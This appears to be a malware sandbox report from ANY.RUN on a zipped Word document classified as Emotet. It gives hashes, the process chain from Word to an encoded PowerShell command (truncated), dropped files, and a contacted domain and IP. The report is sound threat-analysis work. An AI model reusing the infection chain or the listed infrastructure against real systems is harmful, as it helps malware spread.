| Field | Value |
|---|---|
| File name | sample.zip |
| Full analysis | https://app.any.run/tasks/fd729e81-22e5-4de1-a23a-2a0f2497ebae |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it was upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected in mass spam email campaigns. |
| Analysis date | October 14, 2019, 15:20:33 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| MIME | application/zip |
| File info | Zip archive data, at least v2.0 to extract |
| MD5 | E0BAAF15FF9ABA4CCACC7901461A7B7D |
| SHA1 | 43A91D452F6BE306CFB1F0C0C0710C775780991C |
| SHA256 | 785A7393000AEA7B7F5E252E9DC22936666853C38B2BB34C92530095D45CD16C |
| SSDEEP | 3072:R8BZjyqMxwEQkPSMc9eva6ziHeGVp6meADYEX1ZYIG0VM8t:R8B5BMfIoaNRVgWDTX1ZbG4 |
| Extension | Description |
|---|---|
| .zip | ZIP compressed archive (100) |

| ZIP metadata | Value |
|---|---|
| ZipRequiredVersion | 788 |
| ZipBitFlag | 0x0001 |
| ZipCompression | Deflated |
| ZipModifyDate | 2019:10:14 15:20:03 |
| ZipCRC | 0x5e240e69 |
| ZipCompressedSize | 166608 |
| ZipUncompressedSize | 280064 |
| ZipFileName | 39b828dfbbee573d93584d84c0ed2e9bfac65f44d9acab1a97bd052bd0e5b7b6.bin |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2104 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\sample.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
| 3012 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\papajohns.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| 2064 | powershell -enco … | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |

| PID | User | Company | Integrity level | Description | Version |
|---|---|---|---|---|---|
| 2104 | admin | Alexander Roshal | MEDIUM | WinRAR archiver | 5.60.0 |
| 3012 | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 14.0.6024.1000 |
| 2064 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2159.tmp.cvr | — | — | — |
| 2064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z5XHP0OQQF4RQYA731J7.temp | — | — | — |
| 3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 1758F84A3F62413C7517AC6E872C99E9 | D61076D52014648BC5C9A8A77119F576836A83E788C834086572581A1908F908 |
| 3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9B04D17.wmf | wmf | 1BFE099A90FAB05C195222CD14B04102 | A6D1EDEF80BB10701BF1B2F2340A4A899C4CBC6FCDA894B1A75F7271FFE9D305 |
| 3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DD168D9.wmf | wmf | 26456A5B0F195CBF1182E6310ED4B97C | AFEBC2496C157D8462F7A849721C959D303DCE7A4B931927993524A0C1E3BD73 |
| 3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B2FEE38.wmf | wmf | 7336E71E93A1B0BFA6901D91FAA547C8 | 4383262EF326FE758DA53407048F353265D86D1B14B70E74F19ACD45AEC5450E |
| 2104 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2104.45929\39b828dfbbee573d93584d84c0ed2e9bfac65f44d9acab1a97bd052bd0e5b7b6.bin | document | FEC4795055DE05BA9B434BCF5F372E19 | 39B828DFBBEE573D93584D84C0ED2E9BFAC65F44D9ACAB1A97BD052BD0E5B7B6 |
| 3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\166AE1EE.wmf | wmf | 34ED6F7A829314D7BDB154AD22EC92AF | 28DAC4CED4FE090DF96FDCCC4A579DA28D2F5C2A76DA37E14B92AC4CDBAC6CC2 |
| 3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F388E3D.wmf | wmf | 60EBC56D56472CA242A746C96EC337EB | 4FC019E24824CAC6246AEAD69E56002EF20EED33A5DF8EDD551BCE02334CE9E9 |
| 3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3495361.wmf | wmf | 0D1C5E4D9DE440BF2991A05E04577B97 | 6199B78311078F8CF0AFDEA6AB23E83E50967E7ADE60C5E7B6622098837FFE48 |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| — | — | 172.104.51.209:443 | tongdogiare.com | Linode, LLC | SG | unknown |
| Domain | IP | Reputation |
|---|---|---|
| tongdogiare.com | | unknown |